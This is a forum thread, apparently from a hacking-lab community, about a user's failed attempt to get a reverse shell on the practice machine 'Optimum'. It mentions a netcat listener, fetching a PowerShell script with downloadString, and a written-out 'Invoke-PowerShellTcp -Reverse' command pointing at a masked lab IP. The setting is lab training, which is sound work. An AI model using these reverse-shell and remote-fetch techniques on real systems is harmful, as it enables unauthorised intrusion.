Optimum

Hello everyone
im trying to root Optimum for a while
now i found the code execution tried to ping my self it works well
then i fired up netcat to listen on port 1337 and i did the downloadString thing to get my powershell reverseTcp into the machine
it also worked i got the 'GET' request in the terminal everything goes well but i dont get any response on the nc session
so i decieded to checkout the script and it looks good nothing wrong i mentiond the Invoke-PowerShellTcp -Reverse -IPAddress 10.10.1X.XX -Port 1337
at the bottom of the script so i dont need to run it twice and also i tried to run it manually and still no response
tried to exploit it via Empire but yet nothing..
i dont know what i doing wrong ,aybe im not in the right path

any hint/advice will be appreciated
Thanks :)

z0drum

Comments

  • edited October 2019

    Type your comment> @z0drum said:

    Hello everyone
    im trying to root Optimum for a while
    now i found the code execution tried to ping my self it works well
    then i fired up netcat to listen on port 1337 and i did the downloadString thing to get my powershell reverseTcp into the machine
    it also worked i got the 'GET' request in the terminal everything goes well but i dont get any response on the nc session
    so i decieded to checkout the script and it looks good nothing wrong i mentiond the Invoke-PowerShellTcp -Reverse -IPAddress 10.10.1X.XX -Port 1337
    at the bottom of the script so i dont need to run it twice and also i tried to run it manually and still no response
    tried to exploit it via Empire but yet nothing..
    i dont know what i doing wrong ,aybe im not in the right path

    any hint/advice will be appreciated
    Thanks :)

    Have you edited the exploit ?

  • I edited everything + mentioned
    IP Address and Port
    The exploit looks fine

    z0drum

  • I've been unable to root it for 3 months now . . . neither of the exploits that ippsec used are working for me, I know you have to try them multiple times.

  • just got his done. Not using Metasploit. All using Powershell scripts. Gonnna run a few times, just so I get the process down. If you need help DM me, I can see where you may have made a wrong turn.

  • edited March 17

    just managed

Sign In to comment.